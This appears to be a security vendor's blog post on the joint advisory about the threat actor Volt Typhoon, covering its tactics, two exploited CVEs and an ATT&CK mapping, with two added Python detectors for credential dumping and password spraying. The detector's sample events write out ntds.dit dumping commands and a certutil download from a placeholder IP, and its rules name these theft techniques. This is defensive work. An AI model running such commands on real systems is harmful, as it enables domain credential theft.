Several international cybersecurity authorities from the US, UK, Australia, Canada and New Zealand have issued a joint advisory detailing the tactics, techniques and procedures used in recent attacks by a Chinese state-sponsored threat actor.
Background
On May 24, several international agencies - including the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA) of the United States, the Australian Cyber Security Centre (ACSC), the Communications Security Establishment's Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ) and the UK National Cyber Security Centre (NCSC-UK) - issued a joint cybersecurity advisory (CSA), AA23-144a, on Volt Typhoon, a state-sponsored threat actor from the People's Republic of China (PRC). In addition to the joint CSA, Microsoft's Threat Intelligence team published a separate blog post which also highlights activity associated with Volt Typhoon.
Analysis
The following are some of the key points described in the joint cybersecurity advisory:
Where does the name "Volt Typhoon" come from?
It is part of a new naming convention used by Microsoft.
How long has Volt Typhoon been active?
Reports suggest the group has been active since "at least 2021."
What are some of the geographic regions and industries that Volt Typhoon is targeting?
In both the joint CSA and Microsoft's blog post, Volt Typhoon has been observed targeting critical infrastructure organizations in the United States as well as the US island territory of Guam.
What is notable about Volt Typhoon's activity?
The threat actor has a strong focus on stealth, relying on what are known as living-off-the-land (LOTL) techniques and hands-on-keyboard activity.
LOTL techniques rely on legitimate tools already present on the operating system, such as certutil, ntdsutil and xcopy, so that malicious activity blends in with routine administration. Hands-on-keyboard activity, as the name suggests, means a human operator manually executes commands on a compromised system rather than relying on automated or programmed tooling. Both approaches are used to avoid detection by common security solutions such as endpoint detection and response (EDR), which are tuned to flag unknown binaries rather than built-in tools invoked interactively.
Volt Typhoon is known to focus primarily on espionage and information gathering, and the group's recent activity has centered around critical infrastructure, prompting the joint CSA to alert defenders to the threat actor's activity as well as their tactics, techniques and procedures.
Does Volt Typhoon use other techniques to hide their activity?
Yes, the CSA notes the group's use of compromised small office/home office (SOHO) network devices to obfuscate its activity. Devices from a variety of vendors are listed, including:
- ASUS
- Cisco RV
- Draytek Vigor
- FatPipe IPVPN/MPVPN/WARP
- Fortinet Fortigate
- Netgear Prosafe
- Zyxel USG
The group proxies its network traffic through these compromised SOHO devices so that connections to targets appear to be legitimate network activity rather than traffic from attacker-controlled infrastructure. The CSA did not state how these devices were compromised, so we strongly recommend keeping all SOHO devices up to date with the latest security patches.
In addition, if these devices expose their management interfaces to the Internet, follow the vendors' guidance on securing those configurations, or disable remote management where possible.
How does Volt Typhoon gain initial access to targeted organizations?
The group leverages Internet-facing assets such as Fortinet FortiGuard appliances, ManageEngine ADSelfService Plus, and FatPipe's WARP, IPVPN and MPVPN products.
Does Volt Typhoon exploit any known vulnerabilities?
Yes, the joint CSA highlights two vulnerabilities, in ManageEngine and FatPipe products, that have been linked to Volt Typhoon. The agencies note that the vulnerabilities exploited by the threat actor include, but are "not limited to", the following:
CVE | Description | CVSSv3 | VPR* |
---|---|---|---|
CVE-2021-40539 | ManageEngine ADSelfService Plus Authentication Bypass Vulnerability | 9.8 | 9.2 |
CVE-2021-27860 | FatPipe WARP, IPVPN, MPVPN unrestricted upload of file with dangerous type | 8.8 | 7.4 |
*Please note: Tenable's Vulnerability Priority Rating (VPR) scores are calculated each night. This blog post was published on May 25 and reflects the VPR at that time.
Are there other vulnerabilities used by Volt Typhoon?
While Microsoft's blog post notes that Volt Typhoon targets Fortinet FortiGuard devices, no specific CVEs were mentioned. We do know that Fortinet devices are a popular target for APT groups, including APT5, and recent activity has linked Chinese threat actors to several Fortinet vulnerabilities, such as CVE-2022-42475 and CVE-2022-41328. However, we cannot definitively link these vulnerabilities to Volt Typhoon activity.
Historically, Chinese state-sponsored threat actors have continued to exploit known vulnerabilities for years at a time, as shown in similar, older advisories such as U/OO/179811-20 from 2020 and AA22-279A from 2022. For example, CVE-2021-40539, mentioned above, also appears in AA22-279A. In addition, a flash alert issued by the FBI in November 2021, AC-000155-MW, discussed a zero-day vulnerability in FatPipe products that was eventually assigned CVE-2021-27860. In that flash alert, the FBI described exploitation by an APT actor dating back to "at least May 2021", along with the implantation of webshells on vulnerable devices.
As we outlined in our 2022 Threat Landscape Report, known and exploitable vulnerabilities continue to be favored by a number of threat actors. Identifying and remediating vulnerabilities with readily available proof-of-concept (PoC) code should remain a top priority for any organization looking to reduce its exposure.
Does Volt Typhoon use malware?
According to Microsoft's blog post, the group rarely uses malware, preferring LOTL methods and legitimate tools to steal credentials as part of its post-compromise activity.
Is Volt Typhoon targeting Active Directory?
Yes. The threat actor attempts to extract credentials from Active Directory (AD), including by making a copy of the ntds.dit database. With a copy of ntds.dit (together with the SYSTEM registry hive, whose boot key is needed to decrypt the stored hashes), the threat actor can exfiltrate the database and use offline password cracking tools to compromise additional user accounts without generating further authentication noise on the domain controller.
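The LOTL tooling described earlier (certutil, ntdsutil, xcopy, WMI) and the ntds.dit copying described here leave their most reliable trace in process-creation telemetry, because the binaries are legitimate and the command line is the only thing that distinguishes abuse from administration. The following is an added example written for this post, not code from the joint CSA, Microsoft or Tenable: a small command-line detector that maps matches to ATT&CK technique IDs. The event dictionary layout, the sample events and the regular expressions are assumptions constructed for illustration (they resemble Sysmon Event ID 1 / Security 4688 fields but are not real logs), and the T1105 mapping for certutil downloads is this example's own choice, not a mapping taken from the advisory.

```python
"""Added example: detect living-off-the-land credential-dumping command lines.

Event format, sample events and regex heuristics are constructed for this
example; they are not signatures published in AA23-144a."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    technique: str      # MITRE ATT&CK technique ID
    reason: str
    host: str
    command_line: str


# (technique ID, reason, regex over the lower-cased command line).
# The mappings and patterns are this example's assumptions.
RULES = [
    ("T1003.003", "ntdsutil IFM snapshot exports ntds.dit",
     re.compile(r"ntdsutil(\.exe)?\b.*\bifm\b")),
    ("T1003.003", "file copy of the AD database ntds.dit",
     re.compile(r"\b(xcopy|copy|robocopy|esentutl)\b.*ntds\.dit")),
    ("T1105", "certutil used to fetch or decode a payload",
     re.compile(r"certutil(\.exe)?\b.*(-urlcache|-decode|-encode)")),
    ("T1047", "WMI used to spawn a process (often wraps ntdsutil)",
     re.compile(r"wmic(\.exe)?\b.*process\s+call\s+create")),
]


def scan_event(event: dict) -> list[Finding]:
    """Return one Finding per rule matching a single process-creation event."""
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    return [Finding(tid, reason, event.get("Computer", "?"), cmd)
            for tid, reason, rx in RULES if rx.search(low)]


def scan_events(events: list[dict]) -> list[Finding]:
    """Run scan_event over a batch of events and flatten the results."""
    findings: list[Finding] = []
    for ev in events:
        findings.extend(scan_event(ev))
    return findings


# Constructed sample telemetry (not real logs). The first four lines are the
# suspicious ones; the last three are ordinary admin activity that must not fire.
SAMPLE_EVENTS = [
    {"Computer": "DC01",
     "CommandLine": r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\Windows\Temp\snap" q q'},
    {"Computer": "DC01",
     "CommandLine": r'wmic process call create "ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\pro\" q q"'},
    {"Computer": "DC01",
     "CommandLine": r'xcopy C:\Windows\NTDS\ntds.dit C:\Windows\Temp\ /H /Y'},
    {"Computer": "WS07",
     "CommandLine": r'certutil.exe -urlcache -split -f http://198.51.100.10/t.txt C:\Users\Public\t.txt'},
    {"Computer": "WS07",
     "CommandLine": r'certutil.exe -hashfile C:\Users\alice\setup.msi SHA256'},
    {"Computer": "FS02",
     "CommandLine": r'xcopy C:\Data\reports D:\Backup\reports /E'},
    {"Computer": "WS07",
     "CommandLine": r'powershell.exe -NoProfile -Command Get-Service'},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.host:5} {f.technique:10} {f.reason}: {f.command_line}")
```

The WMI-wrapped ntdsutil line produces two findings (T1003.003 and T1047), which is the intended behaviour: the outer wrapper and the inner tool are each worth a separate detection so that neither is lost if the other pattern is tuned away. Because the rules key on the command line rather than the image path, renaming or copying the binary does not defeat them, but an operator who splits arguments across a script file will; pairing this with file-creation telemetry for ntds.dit outside its normal location closes that gap.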
Proof of concept
Of the two vulnerabilities listed in the CSA, publicly available PoC exploit code only exists for CVE-2021-40539.
Identification of affected systems
A list of Tenable plugins to identify the two vulnerabilities highlighted in the CSA can be found here. This link uses a search filter to ensure that all matching plugin coverage is displayed as it is released. We also recommend scanning for and remediating the top 20 CVEs known to be exploited by threat actors associated with China.
The following is a list of MITRE ATT&CK techniques associated with Volt Typhoon, mapped to Tenable Identity Exposure Indicators of Attack (IOA) and to the associated attack path analysis techniques:
Technique ID | Description | Indicator of Attack | Attack path technique |
---|---|---|---|
T1003.001 | OS Credential Dumping: LSASS Memory | I-ProcessInjectionLsass | T1003.001_Windows |
T1003.003 | OS Credential Dumping: NTDS | I-NtdsExtraction | T1003.003_Windows |
T1047 | Windows Management Instrumentation | N/A | T1047_Windows |
T1059.001 | Command and Scripting Interpreter: PowerShell | N/A | T1059.001_Windows |
T1069.001 | Permission Groups Discovery: Local Groups | I-ReconAdminsEnum | T1069.001_Windows |
T1069.002 | Permission Groups Discovery: Domain Groups | N/A | T1069.002_Windows |
T1110.003 | Brute Force: Password Spraying | I-PasswordSpraying | T1110.003_Windows |
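The last row, password spraying (T1110.003), is the one technique in the table that is visible purely in authentication logs, and the distinguishing signal is shape rather than volume: a handful of failures spread across many accounts from one source, as opposed to many failures against one account. The following is an added example written for this post, not code from the CSA, Microsoft or any Tenable product: a sliding-window detector over failed-logon events. The event layout (modelled loosely on Security Event ID 4625 fields), the sample events and the thresholds are constructed assumptions for illustration, not real telemetry or published tuning values.

```python
"""Added example: detect password spraying (T1110.003) in failed-logon events.

Event fields, sample data and thresholds are assumptions made for this
example; they are not drawn from AA23-144a or from Tenable's IOA logic."""
from __future__ import annotations

from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class SprayAlert:
    source_ip: str
    accounts: int          # distinct accounts targeted inside the window
    attempts: int          # failed logons inside the window
    window_start: datetime


def detect_password_spray(events: list[dict],
                          window: timedelta = timedelta(minutes=10),
                          min_accounts: int = 5,
                          max_per_account: int = 2) -> list[SprayAlert]:
    """Per source IP, slide a time window over sorted 4625 events and alert
    when many distinct accounts fail with at most max_per_account tries each.

    The per-account ceiling is what separates a spray from a brute force:
    a brute force piles failures onto one account and never qualifies."""
    by_src: dict[str, list[tuple[datetime, str]]] = defaultdict(list)
    for ev in events:
        if ev["EventID"] != 4625:              # only failed logons matter
            continue
        by_src[ev["IpAddress"]].append(
            (datetime.fromisoformat(ev["TimeCreated"]), ev["TargetUserName"].lower()))

    alerts: list[SprayAlert] = []
    for src, rows in by_src.items():
        rows.sort()
        counts: Counter[str] = Counter()      # accounts inside the window
        start = 0
        best: SprayAlert | None = None
        for end, (t, user) in enumerate(rows):
            counts[user] += 1
            while t - rows[start][0] > window:  # drop events that aged out
                old = rows[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            if len(counts) >= min_accounts and max(counts.values()) <= max_per_account:
                cand = SprayAlert(src, len(counts), end - start + 1, rows[start][0])
                if best is None or cand.accounts > best.accounts:
                    best = cand                 # keep the widest qualifying window
        if best is not None:
            alerts.append(best)
    return alerts


def _ev(time: str, user: str, ip: str, event_id: int = 4625) -> dict:
    return {"EventID": event_id, "TimeCreated": time,
            "TargetUserName": user, "IpAddress": ip}


# Constructed sample events (not real logs), using documentation IP ranges.
SAMPLE_EVENTS = (
    # a spray: one failure per account, walking a user list a minute apart
    [_ev(f"2023-05-25T02:0{i}:00", u, "203.0.113.7")
     for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    # a brute force: eight failures against one account in 40 seconds
    + [_ev(f"2023-05-25T03:00:{s:02d}", "administrator", "198.51.100.9")
       for s in range(0, 40, 5)]
    # benign: one user mistypes twice hours apart, then logs on (4624)
    + [_ev("2023-05-25T08:00:00", "alice", "10.0.0.5"),
       _ev("2023-05-25T13:30:00", "alice", "10.0.0.5"),
       _ev("2023-05-25T13:31:00", "alice", "10.0.0.5", event_id=4624)]
)

if __name__ == "__main__":
    for a in detect_password_spray(SAMPLE_EVENTS):
        print(f"spray from {a.source_ip}: {a.accounts} accounts, "
              f"{a.attempts} attempts from {a.window_start.isoformat()}")
```

Only the 203.0.113.7 source qualifies: the brute force fails the per-account ceiling and the benign user never reaches the account threshold. Keying on source IP is the weak point when the attacker proxies through the compromised SOHO devices discussed above, since each attempt can arrive from a different address; in that situation, re-run the same window logic keyed on a constant such as the workstation name or logon type instead of the IP.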
As both Microsoft and the joint CSA point out, Volt Typhoon has been known to target and exploit Internet-facing assets for the initial compromise of networks. The external attack surface represents one of the biggest risk factors for organizations today. To minimize the risk of a breach, it is important that organizations fully understand their external attack surface and the opportunities for exploitation it presents. Tenable Attack Surface Management (formerly Tenable.asm) provides comprehensive visibility into all your Internet-connected assets, helping you better assess and manage external risks.
Additionally, the joint CSA strongly recommends following best practices for identifying and addressing AD vulnerabilities and misconfigurations. To assist in these efforts, Tenable Identity Exposure (formerly Tenable.ad) can be used to reduce your exposure and find and fix weaknesses before they become business-impacting issues.
Get more information
- Joint Cybersecurity Advisory AA23-144a
- Microsoft Threat Intelligence blog post about Volt Typhoon
- Tenable's 2022 Threat Landscape Report blog post
- Top 20 CVEs Exploited by People's Republic of China State-Sponsored Actors (AA22-279A)
Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
Tenable Security Response Team
The Tenable Security Response Team (SRT) tracks threat and vulnerability intelligence feeds to ensure our research teams can deliver sensor coverage to our products as quickly as possible. The SRT also works to analyze and assess technical details and writes white papers, blogs and additional communications to ensure stakeholders are fully informed of the latest risks and threats. SRT provides breakdowns for the latest vulnerabilities on the Tenable blog.